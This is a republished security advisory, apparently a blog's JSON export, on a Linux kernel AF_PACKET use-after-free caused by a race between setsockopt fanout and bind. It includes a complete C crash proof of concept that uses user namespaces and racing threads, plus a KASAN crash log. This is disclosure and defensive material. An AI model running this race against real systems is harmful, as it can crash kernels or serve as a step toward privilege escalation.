{"id":9947,"date":"2017-10-17T14:19:57","date_gmt":"2017-10-17T22:19:57","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/10\/17\/news-3720\/"},"modified":"2017-10-17T14:19:57","modified_gmt":"2017-10-17T22:19:57","slug":"news-3720","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/10\/17\/news-3720\/","title":{"rendered":"SSD Advisory \u2013 Linux Kernel AF_PACKET Use-After-Free"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 17 Oct 2017 11:42:53 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3484\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3484');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities summary<\/strong><br \/> The following advisory describes a use-after-free vulnerability found in Linux Kernel&#8217;s implementation of AF_PACKET that can lead to privilege escalation.<\/p>\n<p>AF_PACKET sockets &#8220;allow users to send or receive packets on the device driver level. This for example lets them to implement their own protocol on top of the physical layer or to sniff packets including Ethernet and higher levels protocol headers&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> The vulnerability was discovered by an independent security researcher which reported this vulnerabilities to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> &#8220;It is quite likely that this is already fixed by:<br \/> packet: hold bind lock when rebinding to fanout hook &#8211; http:\/\/patchwork.ozlabs.org\/patch\/813945\/<\/p>\n<p>Also relevant, but not yet merged is<br \/> packet: in packet_do_bind, test fanout with bind_lock held &#8211; http:\/\/patchwork.ozlabs.org\/patch\/818726\/<\/p>\n<p>We verified that this does not trigger on v4.14-rc2, but does trigger when reverting that first mentioned commit (008ba2a13f2d).&#8221;<\/p>\n<p><span id=\"more-3484\"><\/span><\/p>\n<p><strong>Vulnerabilities details<\/strong><\/p>\n<p>This use-after-free is due to a race condition between <em>fanout_add<\/em> (from setsockopt) and bind on a AF_PACKET socket.<\/p>\n<p>The race will cause <em>__unregister_prot_hook()<\/em> from <em>packet_do_bind()<\/em> to set <em>po->running<\/em> to 0 even though a <em>packet_fanout<\/em> has been created from <em>fanout_add()<\/em>. <\/p>\n<p>This allows us to bypass the check in <em>unregister_prot_hook()<\/em> from <em>packet_release()<\/em> effectively causing the <em>packet_fanout<\/em> to be released and still being referenced from the <em>packet_type<\/em> linked list.<\/p>\n<p><strong>Crash Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59e6820c9ab00732088113\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/\/ Please note, to have KASAN report the UAF, you need to enable it when compiling the kernel.  \/\/ the kernel config is provided too.    #define _GNU_SOURCE    #include &lt;stdio.h&gt;  #include &lt;stdlib.h&gt;  #include &lt;string.h&gt;  #include &lt;unistd.h&gt;  #include &lt;sys\/types.h&gt;  #include &lt;sys\/socket.h&gt;  #include &lt;sys\/ioctl.h&gt;  #include &lt;net\/if.h&gt;  #include &lt;pthread.h&gt;  #include &lt;sys\/utsname.h&gt;  #include &lt;sched.h&gt;  #include &lt;stdarg.h&gt;  #include &lt;stdbool.h&gt;  #include &lt;sys\/stat.h&gt;  #include &lt;fcntl.h&gt;    #define IS_ERR(c, s) { if (c) perror(s); }    struct sockaddr_ll {  \tunsigned short\tsll_family;  \tshort\t\tsll_protocol; \/\/ big endian  \tint\t\tsll_ifindex;  \tunsigned short\tsll_hatype;  \tunsigned char\tsll_pkttype;  \tunsigned char\tsll_halen;  \tunsigned char\tsll_addr[8];  };    static int fd;  static struct ifreq ifr;  static struct sockaddr_ll addr;    void *task1(void *unused)  {\t  \tint fanout_val = 0x3;    \t\/\/ need race: check on po-&gt;running  \t\/\/ also must be 1st or link wont register  \tint err = setsockopt(fd, 0x107, 18, &amp;fanout_val, sizeof(fanout_val));  \t\/\/ IS_ERR(err == -1, &#8220;setsockopt&#8221;);\t  }    void *task2(void *unused)  {  \tint err = bind(fd, (struct sockaddr *)&amp;addr, sizeof(addr));  \t\/\/ IS_ERR(err == -1, &#8220;bind&#8221;);  }    void loop_race()  {  \tint err, index;    \twhile(1) {  \t\tfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);  \t\tIS_ERR(fd == -1, &#8220;socket&#8221;);    \t\tstrcpy((char *)&amp;ifr.ifr_name, &#8220;lo&#8221;);  \t\terr = ioctl(fd, SIOCGIFINDEX, &amp;ifr);  \t\tIS_ERR(err == -1, &#8220;ioctl SIOCGIFINDEX&#8221;);  \t\tindex = ifr.ifr_ifindex;    \t\terr = ioctl(fd, SIOCGIFFLAGS, &amp;ifr);  \t\tIS_ERR(err == -1, &#8220;ioctl SIOCGIFFLAGS&#8221;);    \t\tifr.ifr_flags &amp;= ~(short)IFF_UP;  \t\terr = ioctl(fd, SIOCSIFFLAGS, &amp;ifr);  \t\tIS_ERR(err == -1, &#8220;ioctl SIOCSIFFLAGS&#8221;);    \t\taddr.sll_family = AF_PACKET;  \t\taddr.sll_protocol = 0x0; \/\/ need something different to rehook &amp;&amp; 0 to skip register_prot_hook  \t\taddr.sll_ifindex = index;    \t\tpthread_t thread1, thread2;  \t    pthread_create (&amp;thread1, NULL, task1, NULL);  \t    pthread_create (&amp;thread2, NULL, task2, NULL);    \t    pthread_join(thread1, NULL);  \t    pthread_join(thread2, NULL);    \t\t\/\/ UAF  \t\tclose(fd);   \t}  }    static bool write_file(const char* file, const char* what, &#8230;) {  \tchar buf[1024];  \tva_list args;  \tva_start(args, what);  \tvsnprintf(buf, sizeof(buf), what, args);  \tva_end(args);  \tbuf[sizeof(buf) &#8211; 1] = 0;  \tint len = strlen(buf);    \tint fd = open(file, O_WRONLY | O_CLOEXEC);  \tif (fd == -1)  \t\treturn false;  \tif (write(fd, buf, len) != len) {  \t\tclose(fd);  \t\treturn false;  \t}  \tclose(fd);  \treturn true;  }    void setup_sandbox() {  \tint real_uid = getuid();  \tint real_gid = getgid();    \tif (unshare(CLONE_NEWUSER) != 0) {  \t\tprintf(&#8220;[!] unprivileged user namespaces are not availablen&#8221;);  \t\tperror(&#8220;[-] unshare(CLONE_NEWUSER)&#8221;);  \t\texit(EXIT_FAILURE);  \t}  \tif (unshare(CLONE_NEWNET) != 0) {  \t\tperror(&#8220;[-] unshare(CLONE_NEWUSER)&#8221;);  \t\texit(EXIT_FAILURE);  \t}    \tif (!write_file(&#8220;\/proc\/self\/setgroups&#8221;, &#8220;deny&#8221;)) {  \t\tperror(&#8220;[-] write_file(\/proc\/self\/set_groups)&#8221;);  \t\texit(EXIT_FAILURE);  \t}  \tif (!write_file(&#8220;\/proc\/self\/uid_map&#8221;, &#8220;0 %d 1n&#8221;, real_uid)) {  \t\tperror(&#8220;[-] write_file(\/proc\/self\/uid_map)&#8221;);  \t\texit(EXIT_FAILURE);  \t}  \tif (!write_file(&#8220;\/proc\/self\/gid_map&#8221;, &#8220;0 %d 1n&#8221;, real_gid)) {  \t\tperror(&#8220;[-] write_file(\/proc\/self\/gid_map)&#8221;);  \t\texit(EXIT_FAILURE);  \t}  }    int main(int argc, char *argv[])   {  \tsetup_sandbox();  \tsystem(&#8220;id; capsh &#8211;print&#8221;);  \tloop_race();\t  \treturn 0;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0110 seconds] -->  <\/p>\n<p><strong>Crash report<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59e6820c9ab0b974057516\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [   73.703931] dev_remove_pack: ffff880067cee280 not found  [   73.717350] ==================================================================  [   73.726151] BUG: KASAN: use-after-free in dev_add_pack+0x1b1\/0x1f0  [   73.729371] Write of size 8 at addr ffff880067d28870 by task poc\/1175  [   73.732594]   [   73.733605] CPU: 3 PID: 1175 Comm: poc Not tainted 4.14.0-rc1+ #29  [   73.737714] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.1-1ubuntu1 04\/01\/2014  [   73.746433] Call Trace:  [   73.747985]  dump_stack+0x6c\/0x9c  [   73.749410]  ? dev_add_pack+0x1b1\/0x1f0  [   73.751622]  print_address_description+0x73\/0x290  [   73.753646]  ? dev_add_pack+0x1b1\/0x1f0  [   73.757343]  kasan_report+0x22b\/0x340  [   73.758839]  __asan_report_store8_noabort+0x17\/0x20  [   73.760617]  dev_add_pack+0x1b1\/0x1f0  [   73.761994]  register_prot_hook.part.52+0x90\/0xa0  [   73.763675]  packet_create+0x5e3\/0x8c0  [   73.765072]  __sock_create+0x1d0\/0x440  [   73.766030]  SyS_socket+0xef\/0x1b0  [   73.766891]  ? move_addr_to_kernel+0x60\/0x60  [   73.769137]  ? exit_to_usermode_loop+0x118\/0x150  [   73.771668]  entry_SYSCALL_64_fastpath+0x13\/0x94  [   73.773754] RIP: 0033:0x44d8a7  [   73.775130] RSP: 002b:00007ffc4e642818 EFLAGS: 00000217 ORIG_RAX: 0000000000000029  [   73.780503] RAX: ffffffffffffffda RBX: 00000000004002f8 RCX: 000000000044d8a7  [   73.785654] RDX: 0000000000000011 RSI: 0000000000000003 RDI: 0000000000000011  [   73.790358] RBP: 00007ffc4e642840 R08: 00000000000000ca R09: 00007f4192e6e9d0  [   73.793544] R10: 0000000000000000 R11: 0000000000000217 R12: 000000000040b410  [   73.795999] R13: 000000000040b4a0 R14: 0000000000000000 R15: 0000000000000000  [   73.798567]   [   73.799095] Allocated by task 1360:  [   73.800300]  save_stack_trace+0x16\/0x20  [   73.802533]  save_stack+0x46\/0xd0  [   73.803959]  kasan_kmalloc+0xad\/0xe0  [   73.805833]  kmem_cache_alloc_trace+0xd7\/0x190  [   73.808233]  packet_setsockopt+0x1d29\/0x25c0  [   73.810226]  SyS_setsockopt+0x158\/0x240  [   73.811957]  entry_SYSCALL_64_fastpath+0x13\/0x94  [   73.814636]   [   73.815367] Freed by task 1175:  [   73.816935]  save_stack_trace+0x16\/0x20  [   73.821621]  save_stack+0x46\/0xd0  [   73.825576]  kasan_slab_free+0x72\/0xc0  [   73.827477]  kfree+0x91\/0x190  [   73.828523]  packet_release+0x700\/0xbd0  [   73.830162]  sock_release+0x8d\/0x1d0  [   73.831612]  sock_close+0x16\/0x20  [   73.832906]  __fput+0x276\/0x6d0  [   73.834730]  ____fput+0x15\/0x20  [   73.835998]  task_work_run+0x121\/0x190  [   73.837564]  exit_to_usermode_loop+0x131\/0x150  [   73.838709]  syscall_return_slowpath+0x15c\/0x1a0  [   73.840403]  entry_SYSCALL_64_fastpath+0x92\/0x94  [   73.842343]   [   73.842765] The buggy address belongs to the object at ffff880067d28000  [   73.842765]  which belongs to the cache kmalloc-4096 of size 4096  [   73.845897] The buggy address is located 2160 bytes inside of  [   73.845897]  4096-byte region [ffff880067d28000, ffff880067d29000)  [   73.851443] The buggy address belongs to the page:  [   73.852989] page:ffffea00019f4a00 count:1 mapcount:0 mapping:          (null) index:0x0 compound_mapcount: 0  [   73.861329] flags: 0x100000000008100(slab|head)  [   73.862992] raw: 0100000000008100 0000000000000000 0000000000000000 0000000180070007  [   73.866052] raw: dead000000000100 dead000000000200 ffff88006cc02f00 0000000000000000  [   73.870617] page dumped because: kasan: bad access detected  [   73.872456]   [   73.872851] Memory state around the buggy address:  [   73.874057]  ffff880067d28700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  [   73.876931]  ffff880067d28780: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  [   73.878913] &gt;ffff880067d28800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  [   73.880658]                                                              ^  [   73.884772]  ffff880067d28880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  [   73.890978]  ffff880067d28900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  [   73.897763] ==================================================================<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab0b974057516-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab0b974057516-73\">73<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-1\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.703931<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dev_remove_pack<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880067cee280 <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">found<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-2\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.717350<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-3\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.726151<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BUG<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">KASAN<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">use<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">after<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">free <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dev_add_pack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1b1<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-4\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.729371<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Write <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-i\">size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-e\">addr <\/span><span class=\"crayon-e\">ffff880067d28870 <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-e\">task <\/span><span class=\"crayon-v\">poc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1175<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-5\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.732594<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-6\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.733605<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CPU<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PID<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1175<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Comm<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">poc <\/span><span class=\"crayon-st\">Not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">tainted<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4.14.0<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rc1<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#29<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-7\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.737714<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Hardware <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">QEMU <\/span><span class=\"crayon-e\">Standard <\/span><span class=\"crayon-e\">PC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i440FX<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PIIX<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1996<\/span><span 